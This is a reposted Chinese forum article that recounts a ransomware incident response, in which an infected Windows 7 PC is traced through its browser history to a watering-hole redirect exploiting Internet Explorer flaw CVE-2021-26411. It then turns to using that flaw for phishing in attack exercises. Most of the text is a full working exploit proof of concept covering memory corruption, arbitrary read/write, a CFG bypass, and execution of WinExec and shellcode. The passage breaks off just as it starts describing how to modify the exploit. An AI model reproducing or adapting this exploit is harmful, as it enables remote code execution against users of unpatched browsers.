设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 由一次勒索病毒应急响应浅谈hw中IE钓鱼的可能性 ...
返回列表 发新帖
查看: 3428|回复: 0

由一次勒索病毒应急响应浅谈hw中IE钓鱼的可能性

[复制链接]
Delina

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-12-23 18:22:03 | 显示全部楼层 |阅读模式
原文链接:由一次勒索病毒应急响应浅谈hw中IE钓鱼的可能性

一、简介上周到某公司进行勒索病毒的溯源,说来也是倒霉,这家公司一年中了三次勒索病毒了,属实惨兮兮。经过排查发现这个遇到的勒索病毒跟之前遇到的不太一样,并不是通过常规暴力破解SMB,RDP服务进行扩散的,而是通过IE浏览器的漏洞,远程加载恶意程序,文件不落地的形式进行的投毒,所以才有了此文。
二、勒索病毒应急溯源2.1 常规分析从勒索病毒应急响应的经验初步判断可能是此台PC违规开放的端口(445,3389)遭受到了外网爆破,但是通过日志查看工具evtxLogparse发现此台中病毒的PC并没有遭受暴力破解,常规高危端口也没有开放

2.2 转换思路因为中毒PC为windows7系统,且使用较老版本的IE浏览器,怀疑是受害者点击了恶意链接后跳转至投毒域名,利用IE漏洞CVE-2021-26411进行RCE病毒投放。利用工具browsinghistoryview以xls格式导出浏览器记录

发现两条可疑访问记录,域名0v2726xb2736ad7z.gosgrew.quest的命名方式无规则,很像是随机命名的

通过在线情报查询,可以发现此域名注册时间很短。经过排查,初步判断此台PC中勒索病毒的过程是这样的:攻击者很可能采用了水坑攻击的方式,受害者在不知情的情况下访问了http://eudoxia-myr.com/favicon.ico(或者http://eudoxia-myr.com下的某一链接)此网站是已经被黑客入侵过的网站,访问此网站某些链接会直接跳转到恶意投毒域名(http://0v2726xb2736ad7z.gosgrew.quest/)利用IE漏洞CVE-2021-26411进行RCE投毒。
三、两种IE浏览器漏洞利用方式3.1 CVE-2021-26411(Internet Explorer内存损坏漏洞)3.1.1 漏洞简介CVE-2021-26411可以作为一种新型传播勒索病毒的方式,漏洞原理就是远程代码执行,可以调用windows API或者shellcode
3.1.2 影响范围
  1. Internet Explorer 11(IE8亲测是不行的)
  2. Microsoft Edge   (EdgeHTML-based)

  4. Windows 7 SP1
  5. Windows 8.1
  6. Windows RT 8.1
  7. Windows 10 Version 1607, 1803,1809,   1909, 2004,20H2
  8. Windows Server 2008 SP2
  9. Windows Server 2008 R2 SP1
  10. Windows Server 2012, 2012 R2, 2016, 2019
  11. Windows Server version 1909, 2004,20H2
复制代码


3.1.3 利用条件​用户认证:不需要用户认证触发方式:远程3.1.4 漏洞复现直接借鉴了网上的POC
  1. //https://www.52pojie.cn/thread-1434380-1-1.html

  3. <!-- IE Double Free 1Day Poc -->
  4. <!doctype html>
  5. <html lang="zh-cmn-Hans">
  6. <head>
  7. <meta http-equiv="Cache-Control" content="no-cache">
  8. </head>
  9. <body>
  10. <script language="javascript">

  12. // 重复字符串
  13. String.prototype.repeat = function (size) { return new Array(size + 1).join(this) }

  15. function pad0(str) {
  16.     // 提取倒数第四个字符开始的字符串,效果就是补0
  17.     return ('0000' + str).slice(-4)
  18. }

  20. // Access of Resource Using Incompatible Type ('Type Confusion')
  21. function alloc1() {
  22.     // DataView 视图是一个可以从 二进制ArrayBuffer 对象中读写多种数值类型的底层接口,使用它时,不用考虑不同平台的字节序问题。
  23.     var view = new DataView(abf)
  24.     var str = ''
  25.     for (var i = 4; i < abf.byteLength - 2; i += 2)
  26.         str += '%u' + pad0(view.getUint16(i, true).toString(16))
  27.     // 创建并返回一个新的属性节点
  28.     var result = document.createAttribute('alloc')
  29.     // 对escape()编码的字符串进行解码
  30.     result.nodeValue = unescape(str)
  31.     return result
  32. }

  34. function alloc2() {
  35.     // 创建字典对象
  36.     var dic1 = new ActiveXObject('Scripting.Dictionary')
  37.     var dic2 = new ActiveXObject('Scripting.Dictionary')
  38.     // 增加新项,dic.add(key,value)
  39.     dic2.add(0, 1)
  40.     dic1.add(0, dic2.items())
  41.     dic1.add(1, fake)
  42.     dic1.add(2, arr)
  43.     for (i = 3; i < 0x20010 / 0x10; ++i)
  44.         dic1.add(i, 0x12341234)
  45.     return dic1.items()
  46. }

  48. function dump(nv) {
  49.     // ArrayBuffer 对象用来表示通用的、固定长度的原始二进制数据缓冲区。
  50.     // 创建一个0x20010字节的缓冲区,并使用一个 DataView 来引用它
  51.     var ab = new ArrayBuffer(0x20010)
  52.     var view = new DataView(ab)
  53.     for (var i = 0; i < nv.length; ++i)
  54.         view.setUint16(i * 2 + 4, nv.charCodeAt(i), true)
  55.     return ab
  56. }

  58. // 在原型对象上定义属性
  59. function Data(type, value) {
  60.     this.type = type
  61.     this.value = value
  62. }

  64. function setData(i, data) {
  65.     var arr = new Uint32Array(abf)
  66.     arr[i * 4] = data.type
  67.     arr[i * 4 + 2] = data.value
  68. }

  70. function flush() {
  71.     hd1.nodeValue = (new alloc1()).nodeValue
  72.     hd2.nodeValue = 0
  73.     // 返回调用该方法的节点的一个副本.
  74.     hd2 = hd1.cloneNode()
  75. }

  77. // 小端序读取
  78. function read(addr, size) {
  79.     switch (size) {
  80.         case 8:
  81.             return god.getUint8(addr)
  82.         case 16:
  83.             // getUint16(byteOffset [, littleEndian])
  84.             return god.getUint16(addr, true)
  85.         case 32:
  86.             return god.getUint32(addr, true)
  87.     }
  88. }

  90. function write(addr, value, size) {
  91.     switch (size) {
  92.         case 8:
  93.             return god.setUint8(addr, value)
  94.         case 16:
  95.             return god.setUint16(addr, value, true)
  96.         case 32:
  97.             return god.setUint32(addr, value, true)
  98.     }
  99. }

  101. function writeData(addr, data) {
  102.     for (var i = 0; i < data.length; ++i)
  103.         write(addr + i, data[i], 8)
  104. }

  106. function addrOf(obj) {
  107.     arr[0] = obj
  108.     return read(pArr, 32)
  109. }

  111. function strcmp(str1, str2) {
  112.     // typeof 操作符返回一个字符串,表示未经计算的操作数的类型。
  113.     str1 = (typeof str1 == 'string') ? str1 : toStr(str1)
  114.     str2 = (typeof str2 == 'string') ? str2 : toStr(str2)
  115.     return str1.toLowerCase() == str2.toLowerCase()
  116. }

  118. function memcpy(dst, src, size) {
  119.     for (var i = 0; i < size; ++i)
  120.         write(dst + i, read(src + i, 8), 8)
  121. }

  123. function toStr(addr) {
  124.     var str = ''
  125.     while (true) {
  126.         var c = read(addr, 8)
  127.         // 遇到终结符就退出循环
  128.         if (c == 0) break
  129.         // 返回由指定的 UTF-16 代码单元序列创建的字符串
  130.         str += String.fromCharCode(c)
  131.         addr++
  132.     }
  133.     return str
  134. }

  136. function newStr(str) {
  137.     var buffer = createArrayBuffer(str.length + 1)
  138.     for (var i = 0; i < str.length; ++i) write(buffer + i, str.charCodeAt(i), 8)
  139.     // 写入字符串终结符
  140.     write(buffer + i, 0, 8)
  141.     return buffer
  142. }
  143. // PE文件相关操作函数
  144. function getDllBase(base, name) {
  145.     var tmpValue = 0
  146.     var index = 0
  147.     var iat = base + read(base + read(base + 60, 32) + 128, 32)
  148.     while (true) {
  149.         var offset = read(iat + index * 20 + 12, 32)
  150.         if (strcmp(base + offset, name)) break
  151.         index++
  152.     }
  153.     var addr = read(iat + index * 20 + 16, 32)
  154.     return getBase(read(base + addr, 32))
  155. }

  157. function getBase(addr) {
  158.     var addr = addr & 0xffff0000
  159.     while (true) {
  160.         if (isMZ(addr) && isPE(addr)) break
  161.         addr -= 0x10000
  162.     }
  163.     return addr
  164. }

  166. function isMZ(addr) {
  167.     return read(addr, 16) == 0x5a4d
  168. }

  170. function isPE(addr) {
  171.     var sizeOfHeaders = read(addr + 60, 32)
  172.     if (sizeOfHeaders > 0x600) return null
  173.     var addr = addr + sizeOfHeaders
  174.     if (read(addr, 32) != 0x4550) return null
  175.     return addr
  176. }

  178. function winVer() {
  179.     // 返回浏览器的平台和版本信息
  180.     var appVersion = window.navigator.appVersion
  181.     var ver = 0
  182.     // 检测一个字符串是否匹配某个模式,javaScript正则表达式
  183.     if (/(Windows 10.0|Windows NT 10.0)/.test(appVersion)) {
  184.         ver = 100
  185.     } else if (/(Windows 8.1|Windows NT 6.3)/.test(appVersion)) {
  186.         ver = 81
  187.     } else if (/(Windows 8|Windows NT 6.2)/.test(appVersion)) {
  188.         ver = 80
  189.     } else {
  190.         ver = 70
  191.     }
  192.     return ver
  193. }

  195. function createArrayBuffer(size) {
  196.     var ab = new ArrayBuffer(size)
  197.     var bs = read(addrOf(ab) + 0x1c, 32)
  198.     // 设置键值对
  199.     map.set(bs, ab)
  200.     return bs
  201. }

  203. function getProcAddr(addr, name) {
  204.     var eat = addr + read(addr + read(addr + 0x3c, 32) + 0x78, 32)
  205.     var non = read(eat + 0x18, 32)
  206.     var aof = addr + read(eat + 0x1c, 32)
  207.     var aon = addr + read(eat + 0x20, 32)
  208.     var aono = addr + read(eat + 0x24, 32)
  209.     for (var i = 0; i < non; ++i) {
  210.         var offset = read(aon + i * 4, 32)
  211.         if (strcmp(addr + offset, name)) break
  212.     }
  213.     var offset = read(aono + i * 2, 16)
  214.     return addr + read(aof + offset * 4, 32)
  215. }

  217. function readyRpcCall(func) {
  218.     var PRPC_CLIENT_INTERFACE_Buffer = _RPC_MESSAGE.get(msg, 'RpcInterfaceInformation')
  219.     var _MIDL_SERVER_INFO_Buffer = PRPC_CLIENT_INTERFACE.get(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo')
  220.     var RPC_DISPATCH_TABLE_Buffer = _MIDL_SERVER_INFO_.get(_MIDL_SERVER_INFO_Buffer, 'DispatchTable')
  221.     write(RPC_DISPATCH_TABLE_Buffer, func, 32)
  222. }

  224. function setArgs(args) {
  225.     var buffer = createArrayBuffer(48)
  226.     for (var i = 0; i < args.length; ++i) {
  227.         write(buffer + i * 4, args[i], 32)
  228.     }
  229.     _RPC_MESSAGE.set(msg, 'Buffer', buffer)
  230.     _RPC_MESSAGE.set(msg, 'BufferLength', 48)
  231.     _RPC_MESSAGE.set(msg, 'RpcFlags', 0x1000)
  232.     return buffer
  233. }

  235. function callRpcFreeBufferImpl() {
  236.     var buffer = _RPC_MESSAGE.get(msg, 'Buffer')
  237.     _RPC_MESSAGE.set(rpcFree, 'Buffer', buffer)
  238.     return call(rpcFree)
  239. }

  241. function callRpcFreeBuffer() {
  242.     var buffer = _RPC_MESSAGE.get(msg, 'Buffer')
  243.     var result = read(buffer, 32)
  244.     callRpcFreeBufferImpl()
  245.     return result
  246. }

  248. function call2(func, args) {
  249.     readyRpcCall(func)
  250.     var buffer = setArgs(args)
  251.     call(msg)
  252.     map.delete(buffer)
  253.     return callRpcFreeBuffer()
  254. }

  256. function call(addr) {
  257.     var result = 0
  258.     write(paoi + 0x18, addr, 32)
  259.     // 错误处理
  260.     try {
  261.         // rpcrt4!NdrServerCall2
  262.         xyz.normalize()
  263.     } catch (error) {
  264.         result = error.number
  265.     }
  266.     write(paoi + 0x18, patt, 32)
  267.     return result
  268. }

  270. function prepareCall(addr, func) {
  271.     var buf = createArrayBuffer(cattr.size())
  272.     var vft = read(patt, 32)
  273.     memcpy(addr, patt, cbase.size())
  274.     memcpy(buf, vft, cattr.size())
  275.     cbase.set(addr, 'pvftable', buf)
  276.     cattr.set(buf, 'normalize', func)
  277. }

  279. function createBase() {
  280.     var isWin7 = winVer() == 70
  281.     var size = isWin7 ? 560 : 572
  282.     var offset = isWin7 ? 540 : 548
  283.     var addr1 = createArrayBuffer(size + cbase.size())
  284.     var addr2 = createArrayBuffer(48)
  285.     write(addr1 + offset, addr2, 32)
  286.     write(addr2 + 40, 8, 32)
  287.     write(addr2 + 36, 8, 32)
  288.     return {
  289.         size: size,
  290.         addr: addr1
  291.     }
  292. }

  294. function aos() {
  295.     var baseObj = createBase()
  296.     var addr = baseObj.addr + baseObj.size
  297.     var I_RpcTransServerNewConnection = getProcAddr(rpcrt4, 'I_RpcTransServerNewConnection')
  298.     prepareCall(addr, I_RpcTransServerNewConnection)
  299.     return read(read(call(addr)-0xf8, 32), 32)
  300. }

  302. // 自定义结构体的操作
  303. function SymTab(size, sym) {
  304.     this.size = function() {
  305.         return size
  306.     }
  307.     this.set = function(addr, name, value) {
  308.         var o = sym[name]
  309.         write(addr + o.offset, value, o.size)
  310.     }
  311.     this.get = function(addr, name) {
  312.         var o = sym[name]
  313.         return read(addr + o.offset, o.size)
  314.     }
  315. }

  317. // 构造RPC
  318. function initRpc() {
  319.     var data = [50,72,0,0,0,0,0,0,52,0,192,0,16,0,68,13,10,1,0,0,0,0,0,0,0,0,72,0,0,0,9,0,72,0,4,0,9,0,72,0,8,0,9,0,72,0,12,0,9,0,72,0,16,0,9,0,72,0,20,0,9,0,72,0,24,0,9,0,72,0,28,0,9,0,72,0,32,0,9,0,72,0,36,0,9,0,72,0,40,0,9,0,72,0,44,0,9,0,112,0,48,0,9,0,0]
  320.     var NdrServerCall2 = getProcAddr(rpcrt4, 'NdrServerCall2')
  321.     var NdrOleAllocate = getProcAddr(rpcrt4, 'NdrOleAllocate')
  322.     var NdrOleFree = getProcAddr(rpcrt4, 'NdrOleFree')
  323.     var RPCMessageObject = createArrayBuffer(cbase.size())
  324.     var buffer = createArrayBuffer(0x100)
  325.     var buffer2 = createArrayBuffer(0x200)
  326.     var AttributeVtable = read(patt, 32)
  327.     var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
  328.     var TransferSyntaxBuffer = createArrayBuffer(syntaxObject.size())
  329.     var PRPC_CLIENT_INTERFACE_Buffer = createArrayBuffer(PRPC_CLIENT_INTERFACE.size())
  330.     var _MIDL_SERVER_INFO_Buffer = createArrayBuffer(_MIDL_SERVER_INFO_.size())
  331.     var rpcProcStringBuffer = createArrayBuffer(data.length)
  332.     writeData(rpcProcStringBuffer, data)
  333.     var _MIDL_STUB_DESC_Buffer = createArrayBuffer(_MIDL_STUB_DESC.size())
  334.     var RPC_DISPATCH_TABLE_Buffer = createArrayBuffer(RPC_DISPATCH_TABLE.size())
  335.     var NdrServerCall2Buffer = createArrayBuffer(4)
  336.     write(NdrServerCall2Buffer, NdrServerCall2, 32)
  337.     write(MSHTMLSymbolBuffer, osf_vft, 32)
  338.     write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
  339.     write(MSHTMLSymbolBuffer + 8, 0x40, 32)
  340.     cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard'))
  341.     cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext'))
  342.     cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf'))
  343.     cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId'))
  344.     cattr.set(MSHTMLSymbolBuffer, 'normalize', NdrServerCall2)
  345.     cbase.set(RPCMessageObject, 'pSecurityContext', RPCMessageObject + 68)
  346.     write(RPCMessageObject + 76, 1, 32)
  347.     syntaxObject.set(TransferSyntaxBuffer, 'SyntaxVersion.MajorVersion', 2)
  348.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer)
  349.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnAllocate', NdrOleAllocate)
  350.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pfnFree', NdrOleFree)
  351.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'pFormatTypes', buffer2)
  352.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'fCheckBounds', 1)
  353.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'Version', 0x50002)
  354.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'MIDLVersion', 0x800025b)
  355.     _MIDL_STUB_DESC.set(_MIDL_STUB_DESC_Buffer, 'mFlags', 1)
  356.     _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'pStubDesc', _MIDL_STUB_DESC_Buffer)
  357.     _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'DispatchTable', createArrayBuffer(32))
  358.     _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'ProcString', rpcProcStringBuffer)
  359.     _MIDL_SERVER_INFO_.set(_MIDL_SERVER_INFO_Buffer, 'FmtStringOffset', buffer2)
  360.     RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTableCount', 1)
  361.     RPC_DISPATCH_TABLE.set(RPC_DISPATCH_TABLE_Buffer, 'DispatchTable', NdrServerCall2Buffer)
  362.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'DispatchTable', RPC_DISPATCH_TABLE_Buffer)
  363.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterpreterInfo', _MIDL_SERVER_INFO_Buffer)
  364.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Length', PRPC_CLIENT_INTERFACE.size())
  365.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'InterfaceId.SyntaxVersion.MajorVersion', 1)
  366.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'TransferSyntax.SyntaxVersion.MajorVersion', 2)
  367.     PRPC_CLIENT_INTERFACE.set(PRPC_CLIENT_INTERFACE_Buffer, 'Flags', 0x4000000)
  368.     _RPC_MESSAGE.set(RPCMessageObject, 'RpcInterfaceInformation', PRPC_CLIENT_INTERFACE_Buffer)
  369.     _RPC_MESSAGE.set(RPCMessageObject, 'TransferSyntax', TransferSyntaxBuffer)
  370.     _RPC_MESSAGE.set(RPCMessageObject, 'Handle', MSHTMLSymbolBuffer)
  371.     _RPC_MESSAGE.set(RPCMessageObject, 'DataRepresentation', 16)
  372.     _RPC_MESSAGE.set(RPCMessageObject, 'RpcFlags', 0x1000)
  373.     _RPC_MESSAGE.set(RPCMessageObject, 'Buffer', buffer)
  374.     _RPC_MESSAGE.set(RPCMessageObject, 'BufferLength', 48)
  375.     return RPCMessageObject
  376. }

  378. function rpcFree() {
  379.     var Cbase = createArrayBuffer(cbase.size())
  380.     var I_RpcFreeBuffer = getProcAddr(rpcrt4, 'I_RpcFreeBuffer')
  381.     var MSHTMLSymbolBuffer = createArrayBuffer(0x1000)
  382.     var AttributeVtable = read(patt, 32)
  383.     write(MSHTMLSymbolBuffer, osf_vft, 32)
  384.     write(MSHTMLSymbolBuffer + 4, 0x89abcdef, 32)
  385.     write(MSHTMLSymbolBuffer + 8, 64, 32)
  386.     cattr.set(MSHTMLSymbolBuffer, '__vtguard', cattr.get(AttributeVtable, '__vtguard'))
  387.     cattr.set(MSHTMLSymbolBuffer, 'SecurityContext', cattr.get(AttributeVtable, 'SecurityContext'))
  388.     cattr.set(MSHTMLSymbolBuffer, 'JSBind_InstanceOf', cattr.get(AttributeVtable, 'JSBind_InstanceOf'))
  389.     cattr.set(MSHTMLSymbolBuffer, 'JSBind_TypeId', cattr.get(AttributeVtable, 'JSBind_TypeId'))
  390.     cattr.set(MSHTMLSymbolBuffer, 'normalize', I_RpcFreeBuffer)
  391.     cbase.set(Cbase, 'pvftable', MSHTMLSymbolBuffer)
  392.     cbase.set(Cbase, 'pSecurityContext', Cbase + 68)
  393.     write(Cbase + 76, 1, 32)
  394.     return Cbase
  395. }

  397. function CFGObject(baseAddress) {
  398.     var PEAddr = isPE(baseAddress)
  399.     var eat = PEAddr + 120
  400.     var LOAD_CONFIG_DIRECTORY = baseAddress + read(eat + 0x50, 32)
  401.     var size = read(LOAD_CONFIG_DIRECTORY, 32)
  402.     var sizeOfImage = read(PEAddr + 0x50, 32)
  403.     var CFGSymbolTable = new SymTab(0x5c, {
  404.         '___guard_check_icall_fptr': {
  405.             offset: 72,
  406.             size: 32
  407.         }
  408.     })

  410.     var guard_check_icall_fptr_address = size < CFGSymbolTable.size() ? 0 : CFGSymbolTable.get(LOAD_CONFIG_DIRECTORY, '___guard_check_icall_fptr')
  411.     this.getCFGAddress = function() {
  412.         return guard_check_icall_fptr_address
  413.     }
  414.     this.getCFGValue = function() {
  415.         if (size < CFGSymbolTable.size()) return false
  416.         var currentCFGValue = read(guard_check_icall_fptr_address, 32)
  417.         var isValidAddress = (baseAddress < currentCFGValue) && (currentCFGValue < baseAddress + sizeOfImage)
  418.         return !isValidAddress;
  419.     }
  420. }

  422. function killCfg(addr) {
  423.     var cfgobj = new CFGObject(addr)
  424.     if (!cfgobj.getCFGValue()) return
  425.     var guard_check_icall_fptr_address = cfgobj.getCFGAddress()
  426.     var KiFastSystemCallRet = getProcAddr(ntdll, 'KiFastSystemCallRet')
  427.     var tmpBuffer = createArrayBuffer(4)
  428.     // 修改RPCRT4!__guard_check_icall_fptr的属性为PAGE_EXECUTE_READWRITE
  429.     call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, 0x40, tmpBuffer])
  430.     // 替换rpcrt4!__guard_check_icall_fptr保存的指针,修改ntdll!LdrpValidateUserCallTarget为改为ntdll!KiFastSystemCallRet
  431.     // 关闭rpcrt4的CFG检查
  432.     write(guard_check_icall_fptr_address, KiFastSystemCallRet, 32)
  433.     // 恢复PRCRT4!__gurad_check_icall_fptr内存属性
  434.     call2(VirtualProtect, [guard_check_icall_fptr_address, 0x1000, read(tmpBuffer, 32), tmpBuffer])
  435.     map.delete(tmpBuffer)
  436. }

  438. // {} 表示对象
  439. // 属性:属性值
  440. var cbase = new SymTab(0x60, {
  441.     'pvftable': {
  442.         offset: 0x0,
  443.         size: 32
  444.     },
  445.     'pSecurityContext': {
  446.         offset: 0x44,
  447.         size: 32
  448.     }
  449. })

  451. var cattr = new SymTab(0x32c, {
  452.     '__vtguard': {
  453.         offset: 0x48,
  454.         size: 32
  455.     },
  456.     'SecurityContext': {
  457.         offset: 0xc8,
  458.         size: 32
  459.     },
  460.     'JSBind_TypeId': {
  461.         offset: 0x160,
  462.         size: 32
  463.     },
  464.     'JSBind_InstanceOf': {
  465.         offset: 0x164,
  466.         size: 32
  467.     },
  468.     'normalize': {
  469.         offset: 0x28c,
  470.         size: 32
  471.     }
  472. })

  474. var syntaxObject = new SymTab(0x14, {
  475.     'SyntaxVersion.MajorVersion': {
  476.         offset: 0x10,
  477.         size: 16
  478.     }
  479. })

  481. var PRPC_CLIENT_INTERFACE = new SymTab(0x44, {
  482.     'Length': {
  483.         offset: 0,
  484.         size: 32
  485.     },
  486.     'InterfaceId.SyntaxVersion.MajorVersion': {
  487.         offset: 20,
  488.         size: 16
  489.     },
  490.     'TransferSyntax.SyntaxVersion.MajorVersion': {
  491.         offset: 40,
  492.         size: 16
  493.     },
  494.     // 保存了runtime库和Stub函数的接口指针
  495.     'DispatchTable': {
  496.         offset: 44,
  497.         size: 32
  498.     },
  499.     // 指向MIDL_SERVER_INFO结构
  500.     'InterpreterInfo': {
  501.         offset: 60,
  502.         size: 32
  503.     },
  504.     'Flags': {
  505.         offset: 64,
  506.         size: 32
  507.     }
  508. })

  510. // 保存了服务端IDL接口信息
  511. var _MIDL_SERVER_INFO_ = new SymTab(0x20, {
  512.     'pStubDesc': {
  513.         offset: 0,
  514.         size: 32
  515.     },
  516.     // 保存了服务端提供的远程调用例程的函数指针数组
  517.     'DispatchTable': {
  518.         offset: 4,
  519.         size: 32
  520.     },
  521.     'ProcString': {
  522.         offset: 8,
  523.         size: 32
  524.     },
  525.     'FmtStringOffset': {
  526.         offset: 12,
  527.         size: 32
  528.     }
  529. })

  531. var _MIDL_STUB_DESC = new SymTab(0x50, {
  532.     'RpcInterfaceInformation': {
  533.         offset: 0,
  534.         size: 32
  535.     },
  536.     'pfnAllocate': {
  537.         offset: 4,
  538.         size: 32
  539.     },
  540.     'pfnFree': {
  541.         offset: 8,
  542.         size: 32
  543.     },
  544.     'pFormatTypes': {
  545.         offset: 32,
  546.         size: 32
  547.     },
  548.     'fCheckBounds': {
  549.         offset: 36,
  550.         size: 32
  551.     },
  552.     'Version': {
  553.         offset: 40,
  554.         size: 32
  555.     },
  556.     'MIDLVersion': {
  557.         offset: 48,
  558.         size: 32
  559.     },
  560.     'mFlags': {
  561.         offset: 64,
  562.         size: 32
  563.     }
  564. })

  566. var RPC_DISPATCH_TABLE = new SymTab(12, {
  567.     'DispatchTableCount': {
  568.         offset: 0,
  569.         size: 32
  570.     },
  571.     'DispatchTable': {
  572.         offset: 4,
  573.         size: 32
  574.     },
  575. })

  577. var _RPC_MESSAGE = new SymTab(0x2c, {
  578.     'Handle': {
  579.         offset: 0,
  580.         size: 32
  581.     },
  582.     'DataRepresentation': {
  583.         offset: 4,
  584.         size: 32
  585.     },
  586.     // 存放函数的参数
  587.     'Buffer': {
  588.         offset: 8,
  589.         size: 32
  590.     },
  591.     'BufferLength': {
  592.         offset: 12,
  593.         size: 32
  594.     },
  595.     'TransferSyntax': {
  596.         offset: 20,
  597.         size: 32
  598.     },
  599.     // 指向RPC_SERVER_INTERFACE
  600.     'RpcInterfaceInformation': {
  601.         offset: 24,
  602.         size: 32
  603.     },
  604.     'RpcFlags': {
  605.         offset: 40,
  606.         size: 32
  607.     }
  608. })

  610. var god
  611. // 对象数组
  612. var arr = [{}]
  613. var fake = new ArrayBuffer(0x100)
  614. var abf = new ArrayBuffer(0x20010)
  615. var alloc = alloc2()
  616. // 创建一个HTML 属性对象
  617. var hd0 = document.createAttribute('handle')
  618. var hd1 = document.createAttribute('handle')
  619. var hd2
  620. // 创建一个HTML 元素对象
  621. var ele = document.createElement('element')
  622. var att = document.createAttribute('attribute')
  623. att.nodeValue = {
  624.     valueOf: function() {
  625.         hd1.nodeValue = (new alloc1()).nodeValue
  626.         // 回调时,清除ele对象绑定的所有属性
  627.         ele.clearAttributes()
  628.         hd2 = hd1.cloneNode()
  629.         ele.setAttribute('attribute', 1337)
  630.     }
  631. }
  632. ele.setAttributeNode(att)
  633. ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2))
  634. // 触发valueof函数回调
  635. ele.removeAttributeNode(att)
  636. hd0.nodeValue = alloc
  637. var leak = new Uint32Array(dump(hd2.nodeValue))
  638. var pAbf = leak[6]
  639. var pArr = leak[10]
  640. var VT_I4 = 0x3
  641. var VT_DISPATCH = 0x9
  642. var VT_BYREF = 0x4000
  643. var bufArr = new Array(0x10)
  644. var fakeArr = new Uint32Array(fake)
  645. for (var i = 0; i < 0x10; ++i) setData(i + 1, new Data(VT_BYREF | VT_I4, pAbf + i * 4))
  646. flush()
  647. var ref = new VBArray(hd0.nodeValue)
  648. for (var i = 0; i < 0x10; ++i) bufArr[i] = ref.getItem(i + 1)
  649. ref = null
  650. setData(1, new Data(VT_BYREF | VT_I4, bufArr[4]))
  651. setData(2, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x04))
  652. setData(3, new Data(VT_BYREF | VT_I4, bufArr[4] + 0x1c))
  653. flush()
  654. ref = new VBArray(hd0.nodeValue)
  655. var vt = ref.getItem(1)
  656. var gc = ref.getItem(2)
  657. var bs = ref.getItem(3)
  658. ref = null
  659. for (var i = 0; i < 16; ++i) fakeArr[i] = bufArr[i]
  660. fakeArr[4] = bs + 0x40
  661. fakeArr[16] = vt
  662. fakeArr[17] = gc
  663. fakeArr[24] = 0xffffffff
  664. setData(1, new Data(VT_DISPATCH, bs))
  665. flush()
  666. ref = new VBArray(hd0.nodeValue)
  667. god = new DataView(ref.getItem(1))
  668. ref = null
  669. pArr = read(read(pArr + 0x10, 32) + 0x14, 32) + 0x10
  670. write(read(addrOf(hd0) + 0x18, 32) + 0x28, 0, 32)

  672. var map = new Map()
  673. var jscript9 = getBase(read(addrOf(map), 32))
  674. var rpcrt4 = getDllBase(jscript9, 'rpcrt4.dll')
  675. var msvcrt = getDllBase(jscript9, 'msvcrt.dll')
  676. var ntdll = getDllBase(msvcrt, 'ntdll.dll')
  677. var kernelbase = getDllBase(msvcrt, 'kernelbase.dll')
  678. var VirtualProtect = getProcAddr(kernelbase, 'VirtualProtect')
  679. var LoadLibraryExA = getProcAddr(kernelbase, 'LoadLibraryExA')
  680. var xyz = document.createAttribute('xyz')
  681. var paoi = addrOf(xyz)
  682. var patt = read(addrOf(xyz) + 0x18, 32)
  683. var osf_vft = aos()
  684. var msg = initRpc()
  685. var rpcFree = rpcFree()
  686. killCfg(rpcrt4)

  688. // 调用API,弹出计算器
  689. var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)])
  690. var WinExec = getProcAddr(kernel32,'WinExec')
  691. call2(WinExec,[newStr('calc.exe'),5])

  693. // 调用shellcode
  694. var shellcode = new Uint8Array([0xb8, 0x37, 0x13, 0x00, 0x00, 0xc3])
  695. var msi = call2(LoadLibraryExA, [newStr('msi.dll'), 0, 1]) + 0x5000
  696. var tmpBuffer = createArrayBuffer(4)
  697. call2(VirtualProtect, [msi, shellcode.length, 0x4, tmpBuffer])
  698. writeData(msi, shellcode) // mov eax, 0x1337 ; ret
  699. call2(VirtualProtect, [msi, shellcode.length, read(tmpBuffer, 32), tmpBuffer])
  700. var result = call2(msi, [])
  701. // 根据shellocde的而反汇编结果,这里会弹出0x1337的对话框
  702. alert(result.toString(16))

  704. </script>
  705. </body>
  706. </html>
复制代码

本地测试环境如下:

测试效果如下:

3.1.5 POC改造上面的POC是通过两种方式进行的函数调用:APIshellcode,我暂时只调用了windows API
原有POC在686-589行调用了API
  1. // 调用API,弹出计算器
  2. var kernel32 = call2(LoadLibraryExA,[newStr('kernel32.dll',0,1)])
